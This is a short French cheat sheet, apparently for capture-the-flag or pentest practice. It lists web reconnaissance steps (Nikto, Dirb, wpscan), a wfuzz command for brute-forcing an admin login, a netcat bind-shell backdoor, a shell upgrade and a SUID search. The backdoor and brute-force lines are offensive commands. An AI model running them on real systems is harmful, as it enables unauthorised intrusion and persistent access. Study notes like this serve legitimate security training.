	   ________________________________________________
	  /						   \
	 /      Gare aux <Rabbit Hole> (fausses pistes)     \
	/    Prendre des notes sur toutes les découvertes    \
	\____________________________________________________/


		I   Scan de ports

		II  Recherche d'exploit
	
		III Elévation de privilège



	SITE WEB
	--------


1) Checker => code source
	      robots.txt
	      sitemap.xml
	      license.txt

2) Nikto --url [http://URL]

3) Dirb [http://URL] [DICO] 
dico => /usr/share/dirb/wordlists/big.txt
	/usr/share/dirb/wordlists/common.txt

4) (WORDPRESS) wpscan --url [http://URL_WORDPRESS] --detection-mode aggressive

5) Rechercher Faille LFI/RFI

6) Rechercher Faille d'upload de fichier

7) Rechercher Faille SQLi

8) Brute force d'authentification
wfuzz -c -z file,[DICO] -d "user=admin&pass=FUZZ" [http://URL]
(la variable FUZZ est brute-forcé avec le DICO)
puis rajouter => --hw [NUM] <= pour filtrer les réponses n'ayant pas NUM mots
	




	ASTUCES
	-------

Prendre en compte les indices
Décoder plusieurs fois les encodages (Base64, ...)
Certaines actions débloquent des choses (services, modifications de pages web, ...)


	COMMANDES
	---------

backdoor	=> nc -lp 4242 -e /bin/bash
upgrade shell	=> python -c 'import pty; pty.spawn("/bin/bash")'
SUID		=> find / -perm -u=s -type f 2>/dev/null


